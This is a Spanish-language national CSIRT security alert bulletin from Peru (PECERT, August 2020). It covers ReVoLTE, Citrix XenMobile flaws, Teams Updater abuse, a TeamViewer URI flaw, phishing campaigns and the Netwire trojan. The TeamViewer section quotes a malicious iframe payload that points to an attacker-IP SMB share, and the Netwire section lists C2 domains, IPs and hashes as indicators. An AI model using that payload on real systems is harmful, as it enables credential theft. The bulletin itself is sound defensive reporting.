13

Lima, 13 de agosto de 2020...PECERT Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional [email protected] Fecha: ALERTA INTEGRADA DE SEGURIDAD DIGITAL N 131 13 -08 2020

  • Upload
    others

  • View
    4

  • Download
    0

Embed Size (px)

Citation preview

Page 1: Lima, 13 de agosto de 2020...PECERT Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional pecert@pcm.gob.pe Fecha: ALERTA INTEGRADA DE SEGURIDAD DIGITAL N 131 13 -08 2020
Page 2: Lima, 13 de agosto de 2020...PECERT Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional pecert@pcm.gob.pe Fecha: ALERTA INTEGRADA DE SEGURIDAD DIGITAL N 131 13 -08 2020

PECERT │Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional

www.gob.pe

[email protected]

La presente Alerta Integrada de Seguridad Digital corresponde a un análisis técnico periódico realizado por el

Comando Conjunto de las Fuerzas Armadas, el Ejército del Perú, la Marina de Guerra del Perú, la Fuerza Aérea

del Perú, la Dirección Nacional de Inteligencia, la Policía Nacional del Perú, la Asociación de Bancos del Perú y

la Secretaría de Gobierno Digital de la Presidencia del Consejo de Ministros, en el marco del Centro Nacional de

Seguridad Digital.

El objetivo de esta Alerta es informar a los responsables de la Seguridad de la Información de las entidades

públicas y las empresas privadas sobre las amenazas en el ciberespacio para advertir las situaciones que

pudieran afectar la continuidad de sus servicios en favor de la población.

Las marcas y logotipos de empresas privadas y/o entidades públicas se reflejan para ilustrar la información que

los ciudadanos reciben por redes sociales u otros medios y que atentan contra la confianza digital de las

personas y de las mismas empresas de acuerdo a lo establecido por el Decreto de Urgencia 007-2020.

La presente Alerta Integrada de Seguridad Digital es información netamente especializada para informar a las

áreas técnicas de entidades y empresas. Esta información no ha sido preparada ni dirigida a ciudadanos.

Lima, 13 de agosto de 2020

Page 3: Lima, 13 de agosto de 2020...PECERT Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional pecert@pcm.gob.pe Fecha: ALERTA INTEGRADA DE SEGURIDAD DIGITAL N 131 13 -08 2020

PECERT │Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional

www.gob.pe

[email protected]

Contenido Ciberdelincuentes descifrar el cifrado VoLTE para espiar las llamadas telefónicas. ..................................... 3

Citrix advierte de fallos críticos en el servidor de XenMobile ....................................................................... 4

Los piratas informáticos abusan de Microsoft Teams Updater para instalar malware. ............................... 6

La falla de TeamViewer en la aplicación de Windows permite descifrar contraseñas ................................. 7

Suplantan correos electrónicos de empresa Nominalia................................................................................ 8

Nueva campaña de correo electrónico que suplantan al banco BBVA para distribuir malware .................. 9

Detección del Troyano de acceso remoto Netwire, dirigido a sistemas operativos principales, incluidos

Windows, Linux y MacOS. ...........................................................................................................................10

Índice alfabético ..........................................................................................................................................12

Page 4: Lima, 13 de agosto de 2020...PECERT Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional pecert@pcm.gob.pe Fecha: ALERTA INTEGRADA DE SEGURIDAD DIGITAL N 131 13 -08 2020

PECERT │Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional

www.gob.pe

[email protected]

ALERTA INTEGRADA DE SEGURIDAD DIGITAL N° 131

Fecha: 13-08-2020

Página: 3 de 12

Componente que reporta PECERT│EQUIPO DE RESPUESTAS ANTE INCIDENTES DE SEGURIDAD DIGITAL NACIONAL

Nombre de la alerta Ciberdelincuentes descifrar el cifrado VoLTE para espiar las llamadas telefónicas.

Tipo de ataque Explotación de vulnerabilidades Abreviatura EVC

Medios de propagación Dispositivos móviles

Código de familia H Código de subfamilia H01

Clasificación temática familia Intento de intrusión

Descripción

1. Resumen:

El Equipo de Respuesta ante Incidentes de Seguridad Digital Nacional, advierte que un equipo de investigadores ha publicado algunos detalles sobre una vulnerabilidad, denominado ReVoLTE, y descubierta en el protocolo Voice over LTE (VoLTE) que permitiría, a un potencial atacante, romper el cifrado de las llamadas por la red 4G y escuchar su contenido de forma oculta.

2. Detalles de la alerta:

El protocolo VoLTE o Voice over Long Term Evolution, es una comunicación inalámbrica de alta velocidad estándar para teléfonos móviles y terminales de datos, incluidos los dispositivos y wearables de internet de las cosas (IoT), que implementan tecnología de acceso por radio 4G LTE.

El ataque no explota ninguna falla en el protocolo Voice over LTE (VoLTE); en su lugar, aprovecha la implementación débil de la red móvil LTE por parte de la mayoría de los proveedores de telecomunicaciones en la práctica, lo que permite que un atacante espíe las llamadas telefónicas cifradas realizadas por las víctimas objetivo.

El problema principal es que la mayoría de los operadores móviles utilizan a menudo el mismo flujo de claves para dos llamadas posteriores dentro de una conexión de radio para cifrar los datos de voz entre el teléfono y la misma estación base, es decir, la torre de telefonía móvil.

Por lo tanto, el nuevo ataque ReVoLTE aprovecha la reutilización del mismo flujo de claves por estaciones base vulnerables, lo que permite a los atacantes descifrar el contenido de las llamadas de voz impulsadas por VoLTE en el siguiente escenario.

Sin embargo, la reutilización de una secuencia de claves predecible no es nueva y fue señalada por primera vez por Raza & Lu, pero el ataque ReVoLTE lo convierte en un ataque práctico.

Cabe resaltar, dado que el problema también afecta a una gran cantidad de proveedores en todo el mundo, los investigadores en ciberseguridad desplegaron una aplicación de Android de código abierto, llamada “Mobile Sentinel “, que puede usar para detectar si su red 4G y estaciones base son vulnerables al ataque ReVoLTE o no.

3. Recomendaciones:

Actualizar el sistema operativo del dispositivo móvil.

Tener un antivirus activo y estar actualizado.

Realizar concientización constante a los usuarios sobre este tipo de ciberamenaza.

Fuentes de información Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional

Page 5: Lima, 13 de agosto de 2020...PECERT Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional pecert@pcm.gob.pe Fecha: ALERTA INTEGRADA DE SEGURIDAD DIGITAL N 131 13 -08 2020

PECERT │Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional

www.gob.pe

[email protected]

ALERTA INTEGRADA DE SEGURIDAD DIGITAL N° 131

Fecha: 13-08-2020

Página: 4 de 12

Componente que reporta COMANDO OPERACIONAL DE CIBERDEFENSA DEL COMANDO CONJUNTO DE LAS FUERZAS ARMADAS

Nombre de la alerta Citrix advierte de fallos críticos en el servidor de XenMobile

Tipo de ataque Explotación de vulnerabilidades conocidas Abreviatura EVC

Medios de propagación Red, internet

Código de familia H Código de subfamilia H 01

Clasificación temática familia Intento de intrusión

Descripción

1. El 13 de agosto de 2020, a través del monitoreo y búsqueda de amenazas en el ciberespacio, se tuvo conocimiento que Citrix advierte de fallos críticos en el servidor de XenMobile.

2. Citrix está instando a los usuarios a que parcheen inmediatamente un par de fallos críticos en su software insignia de gestión de dispositivos móviles. Si se explotan, las vulnerabilidades podrían permitir a individuos no autorizados acceder de forma remota a las credenciales de las cuentas de dominio, lo que en última instancia abriría la puerta a un tesoro de datos corporativos, incluyendo el correo electrónico y las aplicaciones web.

3. Los fallos se encuentran en Citrix Endpoint Management (CEM), a menudo denominado XenMobile Server, que permite a las empresas administrar los dispositivos móviles de los empleados y las aplicaciones móviles mediante el control de las configuraciones y actualizaciones de seguridad de los dispositivos. En general, se descubrieron cinco vulnerabilidades, dos de las cuales (CVE-2020-8208 y CVE-2020-8209) se califican como críticas en cuanto a su gravedad.

«Recomendamos que estas actualizaciones se hagan inmediatamente»

«Aunque no se conocen exploits hasta el momento de escribir esto, anticipamos que los atacantes se moverán rápidamente para explotarlas.»

Fermin J. Serna, Jefe de Seguridad de la Información de Citrix

4. Una de las dos vulnerabilidades críticas descubiertas, CVE-2020-8209, es un path traversal que proviene de una validación insuficiente de un input. Los path traversal se derivan de fallos de seguridad en la web que permiten a los atacantes leer archivos en el servidor que está ejecutando una aplicación.

Page 6: Lima, 13 de agosto de 2020...PECERT Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional pecert@pcm.gob.pe Fecha: ALERTA INTEGRADA DE SEGURIDAD DIGITAL N 131 13 -08 2020

PECERT │Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional

www.gob.pe

[email protected]

5. El experto en Tecnologías Positivas, Andrey Medov, que descubrió la vulnerabilidad, dijo que los atacantes pueden explotarla convenciendo a los usuarios de acceder a una URL especialmente diseñada para esto.

6. Entonces serían capaces de acceder a archivos arbitrarios fuera del directorio raíz del servidor web, incluyendo archivos de configuración y claves de encriptación para datos sensibles.

«La explotación de esta vulnerabilidad permite a los hackers obtener información que puede ser útil para romper la seguridad perimetral, ya que el archivo de configuración a menudo almacena las credenciales de la cuenta de dominio para el acceso LDAP [Lightweight Directory Access Protocol; un protocolo estándar de la industria utilizado para acceder a servicios de información de directorio distribuidos a través de una red IP]», dijo Medov en un comunicado. «Con acceso a la cuenta de dominio, un atacante remoto puede utilizar los datos obtenidos para la autenticación en otros recursos externos de la empresa, incluyendo el correo corporativo, VPN y aplicaciones web. Peor aún, un atacante que haya logrado leer el archivo de configuración puede acceder a datos confidenciales, como la contraseña de la base de datos (PostgreSQL local por defecto y una base de datos remota de SQL Server en algunos casos)».

7. Más en concreto, poseen un impacto de nivel crítico las vulnerabilidades existentes en las siguientes tecnologías: XenMobile Server 10.12 antes de RP2, XenMobile Server 10.11 antes de RP4, XenMobile Server 10.10 antes de RP6 y XenMobile Server antes de 10.9 RP5.

8. Los tres restantes (CVE-2020-8210, CVE-2020-8211 y CVE-2020-8212) se clasifican como de gravedad media y baja. No se han publicado más detalles sobre estas vulnerabilidades, ni tampoco del segundo fallo crítico (CVE-2020-8208).

«Los últimos parches que deben aplicarse para las versiones 10.9, 10.10, 10.11 y 10.12 están disponibles inmediatamente», dijo Serna. «Cualquier versión anterior a la 10.9.x debe ser actualizada a una versión soportada con el último parche. Recomendamos que se actualice a 10.12 RP3, la última versión soportada».

9. Citrix se une al resto de empresas que están publicando actualizaciones de seguridad esta semana, incluyendo Intel, que eliminó una vulnerabilidad de gravedad crítica que afectaba a varias de sus placas madre, sistemas de servidores y módulos de computación; Microsoft, que arregló 120 errores, incluyendo dos bajos ataques activos.

10. Se recomienda:

Parchar inmediatamente los fallos críticos en el software de gestión de dispositivos móviles de CITRIX.

Instruir a los usuarios a reportar al área de seguridad informática cualquier comportamiento extraño en su dispositivo.

Aplicar de manera controlada las actualizaciones y parches recomendadas por la marca.

Fuentes de información https[:]//unaaldia.hispasec.com/2020/08/citrix-advierte-de-fallos-criticos-en-el-servidor-de-xenmobile.html

Page 7: Lima, 13 de agosto de 2020...PECERT Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional pecert@pcm.gob.pe Fecha: ALERTA INTEGRADA DE SEGURIDAD DIGITAL N 131 13 -08 2020

PECERT │Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional

www.gob.pe

[email protected]

ALERTA INTEGRADA DE

SEGURIDAD DIGITAL N° 131

Fecha: 13-08-2020

Página: 6 de 12

Componente que reporta CIBERDEFENSA Y TELEMÁTICA DEL EJÉRCITO DEL PERÚ Nombre de la alerta Los piratas informáticos abusan de Microsoft Teams Updater para instalar malware. Tipo de ataque Malware Abreviatura Malware Medios de propagación USB, correo, red, navegación internet. Código de familia C Código de subfamilia C02 Clasificación temática familia Código malicioso

Descripción

1. El 06 de agosto de 2020, a través del monitoreo y búsqueda de amenazas en el ciberespacio, se identificó que la empresa Trustwave, encontró una nueva falla en Microsoft Teams Updater, que permite a los atacantes instalar y ejecutar malware desde una ubicación remota utilizando la técnica Living off the Land.

2. Los atacantes deben colocar el archivo dentro de la red en una carpeta compartida abierta. Luego, los atacantes deben acceder a la carga útil desde ese recurso compartido hasta la máquina víctima.

3. Los atacantes también pueden explotar el error de forma remota configurando un servidor Samba para acceso público remoto, y al iniciar la ejecución del comando, se puede descargar una carga útil de forma remota y ejecutar directamente desde Microsoft Teams Updater "Update.exe".

4. Actualmente muchas empresas han pasado a trabajar en lugares remotos debido a la actual crisis sanitaria por lo cual se debe proteger los sistemas ante ataques cibernéticos.

5. Se recomienda:

Conexiones SMB especialmente desde el actualizador de Microsoft Teams update.exe o filtra las conexiones SMB por completo.

Fuentes de información http[:]//gbhackers.com/hackers-abuse-microsoft-teams-updater-to-install-malware-using-living-off-the-land-technique/

Page 8: Lima, 13 de agosto de 2020...PECERT Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional pecert@pcm.gob.pe Fecha: ALERTA INTEGRADA DE SEGURIDAD DIGITAL N 131 13 -08 2020

PECERT │Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional

www.gob.pe

[email protected]

ALERTA INTEGRADA DE

SEGURIDAD DIGITAL N° 131

Fecha: 13-08-2020

Página: 7 de 12

Componente que reporta CIBERDEFENSA Y TELEMÁTICA DEL EJÉRCITO DEL PERÚ Nombre de la alerta La falla de TeamViewer en la aplicación de Windows permite descifrar contraseñas Tipo de ataque Explotación de vulnerabilidades conocidas Abreviatura EVC Medios de propagación Red, internet Código de familia H Código de subfamilia H01 Clasificación temática familia Intento de intrusión

Descripción

1. El 13 de agosto de 2020, a través del monitoreo y búsqueda de amenazas en el ciberespacio, se ha encontrado información publicada el 12 de agosto de 2020 por Threat Post, sobre una falla en el software Team Viewer, atacantes remotos no autenticados podrían aprovechar la falla de TeamViewer para ejecutar código y descifrar las contraseñas de las víctimas. Si se explota, la falla podría permitir a atacantes remotos no autenticados ejecutar código en los sistemas de los usuarios o descifrar sus contraseñas de TeamViewer.

2. TeamViewer es una aplicación de software patentada utilizada por las empresas para funciones de control remoto, uso compartido de escritorio, reuniones en línea, conferencias web y transferencia de archivos entre computadoras.

3. La falla recientemente descubierta se debe a que la aplicación Desktop para Windows ( CVE-2020-13699 ) no cita correctamente sus controladores de identificador uniforme de recursos (URI) personalizados.

4. Un atacante podría incrustar un iframe malicioso en un sitio web con una URL creada (<iframe src = 'teamviewer10: –play \\ attacker-IP \ share \ fake.tvs'>) que iniciaría el cliente de escritorio de TeamViewer Windows y lo forzaría para abrir un recurso compartido SMB remoto ”.

5. Para iniciar el ataque, el atacante podría simplemente persuadir a una víctima con TeamViewer instalado en su sistema para que haga clic en la URL creada en un sitio web, una oportunidad para que los atacantes lancen ataques potencialmente peligrosos .

6. Luego, el URI engañará a la aplicación para que cree una conexión con el protocolo de bloque de mensajes de servidor (SMB) remoto controlado por el atacante. SMB es un protocolo de red utilizado por computadoras con Windows que permite a los sistemas dentro de la misma red compartir archivos.

7. Se recomienda:

Aplicar los parches adecuados.

Evitar los sitios web que no sean de confianza o los enlaces proporcionados por fuentes desconocidas.

Eeducar a los usuarios sobre las amenazas planteadas por los enlaces de hipertexto contenidos en correos electrónicos o archivos adjuntos, especialmente de fuentes que no sean de confianza.

Fuentes de información https[:]//www.arkalabs.cl/falla-en-teamviewer-podria-ser

Page 9: Lima, 13 de agosto de 2020...PECERT Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional pecert@pcm.gob.pe Fecha: ALERTA INTEGRADA DE SEGURIDAD DIGITAL N 131 13 -08 2020

PECERT │Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional

www.gob.pe

[email protected]

ALERTA INTEGRADA DE SEGURIDAD DIGITAL N° 131

Fecha: 13-08-2020

Página: 8 de 12

Componente que reporta COMANDANCIA DE CIBERDEFENSA DE LA MARINA DE GUERRA DEL PERÚ

Nombre de la alerta Suplantan correos electrónicos de empresa Nominalia

Tipo de ataque Phishing Abreviatura Phishing Medios de propagación Redes sociales, SMS, correo electrónico, videos de internet, entre otros Código de familia G Código de subfamilia G02 Clasificación temática familia Fraude

Descripción

1. El 12 de agosto de 2020, a través del monitoreo y búsqueda de amenazas en el ciberespacio, se detectó una campaña de envío de mensajes de correos electrónicos fraudulentos suplantando la identidad de la empresa Nominalia (Proveedor de servicios de registro de dominios, hosting, comercio electrónico, protección de marca y publicidad en línea), donde indica al usuario que “para recordarle que próximamente caducará o ha caducado el servicio de dominios, para evitar perderlo o que la renovación sea más cara de lo habitual”. asimismo, indica que por medio del enlace https[:]//nominalia com/admin/cgi-bin/order/renew.cgi?xtor puede realizar dicha renovación.

2. Por otro lado, se identificó que la cuenta de correo fraudulento es [email protected].

3. Se recomienda:

Evitar ingresar a enlaces no confiables.

Evitar descargar y abrir archivos de fuentes no confiables.

Mantener los equipos protegidos, con el software actualizado.

Fuentes de información Comandancia de Ciberdefensa de la Marina, Osint

Page 10: Lima, 13 de agosto de 2020...PECERT Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional pecert@pcm.gob.pe Fecha: ALERTA INTEGRADA DE SEGURIDAD DIGITAL N 131 13 -08 2020

PECERT │Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional

www.gob.pe

[email protected]

ALERTA INTEGRADA DE

SEGURIDAD DIGITAL N° 131

Fecha: 13-08-2020

Página: 9 de 12

Componente que reporta DIRECCIÓN NACIONAL DE INTELIGENCIA

Nombre de la alerta Nueva campaña de correo electrónico que suplantan al banco BBVA para distribuir malware

Tipo de ataque Malware Abreviatura Malware

Medios de propagación USB, disco, red, correo, navegación de internet

Código de familia C Código de subfamilia C03

Clasificación temática familia Código malicioso

Descripción

1. Resumen:

Se ha detectado una nueva campaña masiva de envío de correos electrónicos fraudulentos que trata de suplantar a la entidad bancaria BBVA en España para distribuir malware. El objetivo de esta campaña es redirigir a la víctima a una página web falsa (phishing), para poder robar datos personales e información bancaria.

2. Detalles:

El correo electrónico detectado en esta campaña, distribuye un tipo de malware que ha sido identificado como Trojan Downloader, se trata de un malware que está diseñado para descargar e instalar software malicioso en el equipo de la víctima. También puede realizar cambios en la configuración del dispositivo y permitir el acceso a los ciberdelincuentes.

En esta campaña, los ciberdelincuentes alertan a sus víctimas que su cuenta ha sido bloqueada al detectarse una supuesta actividad inusual desde la misma y se pide que realice una prueba de transferencia SEPA, para desbloquearla, deberá hacer clic en un enlace malicioso incluido en el cuerpo del mensaje.

Al hacer clic sobre el enlace malicioso contenido en el correo, se abre el navegador para descargar un archivo malicioso con el nombre “visualizar.zip”, el archivo descargado contiene el malware en su interior. Este compromete la seguridad del equipo y facilita al ciberdelincuente el robo de información

Asimismo, no se descarta que existan otras campañas similares que usen el nombre de otras entidades financieras, instituciones o administraciones públicas para sus fines.

3. Recomendaciones:

No abrir correos de usuarios desconocidos o que no hayas solicitado: elimínalos directamente.

Revisar los enlaces antes hacer clic, aunque sean de contactos conocidos.

Desconfiar de los enlaces acortados.

Desconfiar de los ficheros adjuntos, aunque sean de contactos conocidos.

Tener siempre actualizado el sistema operativo y el antivirus. En el caso del antivirus, comprueba que está activo.

Asegúrate de que las cuentas de usuario utilicen contraseñas robustas y no tienen permisos de administrador.

Fuentes de información hxxps://www.incibe.es/protege-tu-empresa/avisos-seguridad/detectada-campana-malware-correo-electronico-suplanta-al-bbva

Page 11: Lima, 13 de agosto de 2020...PECERT Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional pecert@pcm.gob.pe Fecha: ALERTA INTEGRADA DE SEGURIDAD DIGITAL N 131 13 -08 2020

PECERT │Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional

www.gob.pe

[email protected]

ALERTA INTEGRADA DE

SEGURIDAD DIGITAL N° 131

Fecha: 13-08-2020

Página: 10 de 12

Componente que reporta DIRECCIÓN DE INTELIGENCIA DE LA POLICIA NACIONAL DEL PERÚ

Nombre de la alerta Detección del Troyano de acceso remoto Netwire, dirigido a sistemas operativos principales, incluidos Windows, Linux y MacOS.

Tipo de ataque Troyano Abreviatura Troyano

Medios de propagación USB, disco, red, correo, navegación de internet

Código de familia C Código de subfamilia C01

Clasificación temática familia Código malicioso

Descripción

1. El 13 de agosto de 2020, a través del monitoreo y búsqueda de amenazas en el ciberespacio, se detectó que, en el sitio web “ANY RUN”, se informa sobre la detección del troyano de acceso remoto Netwire, también conocido como Recam o NetWiredRC, dirigido a sistemas operativos principales, incluidos Windows, Linux y MacOS, el cual se distribuye a través de correos electrónicos no deseados con archivos adjuntos de Microsoft Office infectados, anuncios maliciosos en línea, ingeniería social, grietas de software, actualizaciones de software falsas, con la finalidad de robar información o datos confidenciales de la víctima, propagar, descargar e instalar otros tipos de malware, etc.

2. Detalles:

Funcionalidad del troyano Netwire:

o NetWire es utilizado por los actores de la amenaza como registrador de pulsaciones del teclado y el comportamiento del mouse, así como tomar capturas de pantalla, verificar la información del sistema y crear proxy HTTP falsos.

o También registra las pulsaciones de teclas para robar credenciales de cuentas en línea y varias aplicaciones como correo electrónico, navegadores web, etc.

o Los inicios de sesión y contraseñas registrados se utilizan para robar detalles de la cuenta y realizar compras, transacciones, enviar correos electrónicos fraudulentos a otras personas.

o Las pulsaciones de teclas grabadas también pueden incluir datos, información como números de teléfono, direcciones, números de seguro social y otros detalles que podrían utilizarse de forma indebida para robar la identidad de la víctima.

o Además, los ciberdelincuentes utilizan Netwire para robar datos de tarjetas de pago, que se pueden utilizar para realizar compras fraudulentas o se venden a otras partes que también hacen un mal uso de los datos para realizar compras.

Dominios y direcciones IP utilizados por los actores de la amenaza para la ejecución de Netwire.

Dominios IP Dominios IP wsdykung37communicationtarisuplie rmgcxa[.]duckdns[.]org

192[.]169[.]69[.]25 rheuewuw[.]duckdns[.]org 185[.]140[.]53[.]6

orlandoblunblun2020[.]duckdns[.]org 79[.]134[.]225[.]118 boleto[.]duckdns[.]org 79[.]134[.]225[.]79

myfrontmanny[.]duckdns[.]org 193[.]161[.]193[.]99 firebasecloudystemforfileexchange online[.]duckdns[.]org

79[.]134[.]225[.]105

switchtocloudsystemwithserver googleapi[.]duckdns[.]org

45[.]137[.]22[.]101 coolthingy[.]duckdns[.]org 194[.]5[.]97[.]92

coustmers[.]duckdns[.]org 79[.]134[.]225[.]78 31kungcommunicationtaristdysu pliermgjky[.]duckdns[.]org

102[.]89[.]1[.]125

coustmers[.]duckdns[.]org 185[.]244[.]30[.]22 okeyboomer[.]duckdns[.]org 194[.]5[.]97[.]233

juliochar01[.]duckdns[.]org 185[.]19[.]85[.]143 2dejulio2020[.]duckdns[.]org 172[.]245[.]157[.]103

sukablyat[.]duckdns[.]org 184[.]83[.]128[.]202 federa[.]duckdns[.]org 79[.]134[.]225[.]99

suka-blyat[.]duckdns[.]org 82[.]65[.]58[.]129 kremlin-crimea[.]duckdns[.]org 79[.]134[.]225[.]111

kgkhggkk[.]duckdns[.]org 69[.]12[.]94[.]12 anaekppy9sndyinitalymedical consultawry[.]duckdns[.]org

185[.]244[.]30[.]16

Page 12: Lima, 13 de agosto de 2020...PECERT Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional pecert@pcm.gob.pe Fecha: ALERTA INTEGRADA DE SEGURIDAD DIGITAL N 131 13 -08 2020

PECERT │Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional

www.gob.pe

[email protected]

Indicadores de compromiso.

o Archivos analizados: Nombre: ELF

Tipo: ELF

Tamaño: 62.89 KB (64400 bytes)

MD5: 9a0e765eecc5433af3dc726206ecc56e

SHA-1: 5996d02c142588b6c1ed850e461845458bd94d17

SHA-256: 35ff79dd456fe3054a60fe0a16f38bf5fc3928e1e8439ca4d945573f8c48c0b8

Nombre: ELF

Tipo: ELF

Tamaño: 54.88 KB (56200 bytes)

MD5: 94c065fe6cd0afe0bb8aeb9436dfbfe5

SHA-1: 2c4ab78838812c56fd9862cf4235942a475e99e0

SHA-256: f89f09dc353750ff12a9acd8381665990234ac3abbac47a5746ae8c0fdb21f2c

3. Algunas Recomendaciones:

No abra archivos sospechosos.

No siga instrucciones de desconocidos.

Mantenga su antivirus actualizado.

Descargar aplicaciones de fuentes confiables.

Tenga presente que los ciberdelincuentes siempre están buscando estafar a los usuarios.

Fuentes de información https[:]//any.run/malware-trends/netwire

Page 13: Lima, 13 de agosto de 2020...PECERT Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional pecert@pcm.gob.pe Fecha: ALERTA INTEGRADA DE SEGURIDAD DIGITAL N 131 13 -08 2020

PECERT │Equipo de Respuestas ante Incidentes de Seguridad Digital Nacional

www.gob.pe

[email protected]

Página: 12 de 12

Índice alfabético

Código malicioso ...................................................................................................................................................... 6, 9, 10 exploits .............................................................................................................................................................................. 4 Explotación de vulnerabilidades conocidas ................................................................................................................... 4, 7 Fraude ................................................................................................................................................................................ 8 Intento de intrusión ................................................................................................................................................... 3, 4, 7 internet .......................................................................................................................................................................... 3, 6 IoT ...................................................................................................................................................................................... 3 malware ............................................................................................................................................................. 6, 9, 10, 11 Malware ......................................................................................................................................................................... 6, 9 phishing ............................................................................................................................................................................. 9 Phishing ............................................................................................................................................................................. 8 Red, internet .................................................................................................................................................................. 4, 7 redes sociales ..................................................................................................................................................................... 1 Redes sociales .................................................................................................................................................................... 8 Redes sociales, SMS, correo electrónico, videos de internet, entre otros ........................................................................ 8 servidor .................................................................................................................................................................. 4, 5, 6, 7 servidores .......................................................................................................................................................................... 5 software ....................................................................................................................................................... 4, 5, 7, 8, 9, 10 URL ................................................................................................................................................................................. 5, 7 USB, disco, red, correo, navegación de internet ......................................................................................................... 9, 10